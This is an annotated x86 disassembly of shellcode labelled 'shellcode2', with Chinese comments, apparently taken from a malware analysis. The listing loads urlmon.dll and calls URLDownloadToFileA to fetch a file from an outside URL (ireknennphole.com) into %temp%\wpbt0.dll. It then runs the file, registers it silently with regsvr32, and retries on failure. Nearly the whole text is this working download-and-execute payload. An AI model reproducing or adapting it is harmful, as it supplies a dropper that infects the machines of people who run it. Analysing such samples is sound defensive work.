shellcode2

1. 004050EC    54              push    esp
2. 004050ED    FF16            call    dword ptr [esi]                  ; 加载urlmon.dll
3. 004050EF    83C4 08         add     esp, 8
4. 004050F2    8BE8            mov     ebp, eax
5. 004050F4    E8 61FFFFFF     call    0040505A                         ; 调用URLDownLoadToFileA
6. 004050F9    EB 02           jmp     short 004050FD
7. 004050FB    EB 72           jmp     short 0040516F
8. 004050FD    81EC 04010000   sub     esp, 104
9. 00405103    8D5C24 0C       lea     ebx, dword ptr [esp+C]
10. 00405107    C70424 72656773 mov     dword ptr [esp], 73676572
11. 0040510E    C74424 04 76723>mov     dword ptr [esp+4], 32337276
12. 00405116    C74424 08 202D7>mov     dword ptr [esp+8], 20732D20
13. 0040511E    53              push    ebx
14. 0040511F    68 F8000000     push    0F8
15. 00405124    FF56 0C         call    dword ptr [esi+C]                ; 检索系统临时文件目录
16. 00405127    8BE8            mov     ebp, eax
17. 00405129    33C9            xor     ecx, ecx
18. 0040512B    51              push    ecx
19. 0040512C    C7441D 00 77706>mov     dword ptr [ebp+ebx], 74627077
20. 00405134    C7441D 05 2E646>mov     dword ptr [ebp+ebx+5], 6C6C642E
21. 0040513C    C6441D 09 00    mov     byte ptr [ebp+ebx+9], 0
22. 00405141    59              pop     ecx
23. 00405142    8AC1            mov     al, cl
24. 00405144    04 30           add     al, 30
25. 00405146    88441D 04       mov     byte ptr [ebp+ebx+4], al
26. 0040514A    41              inc     ecx
27. 0040514B    51              push    ecx
28. 0040514C    6A 00           push    0
29. 0040514E    6A 00           push    0
30. 00405150    53              push    ebx
31. 00405151    57              push    edi
32. 00405152    6A 00           push    0
33. 00405154    FF56 14         call    dword ptr [esi+14]               ; 将http://ireknennphole.com/w.php?f=26&e=6保存为%temp%\wpbt0.dll
34. 00405157    85C0            test    eax, eax
35. 00405159    75 16           jnz     short 00405171                   ; 未能下载,则跳走.
36. 0040515B    6A 00           push    0
37. 0040515D    53              push    ebx
38. 0040515E    FF56 04         call    dword ptr [esi+4]                ; 运行wpbt0.dll
39. 00405161    6A 00           push    0
40. 00405163    83EB 0C         sub     ebx, 0C
41. 00405166    53              push    ebx
42. 00405167    FF56 04         call    dword ptr [esi+4]                ; 注册wpbt0.dll
43. 0040516A    83C3 0C         add     ebx, 0C
44. 0040516D    EB 02           jmp     short 00405171
45. 0040516F   /EB 13           jmp     short 00405184
46. 00405171   |47              inc     edi
47. 00405172   |803F 00         cmp     byte ptr [edi], 0
48. 00405175  ^|75 FA           jnz     short 00405171
49. 00405177   |47              inc     edi
50. 00405178   |803F 00         cmp     byte ptr [edi], 0
51. 0040517B  ^|75 C4           jnz     short 00405141                   ; 重新下载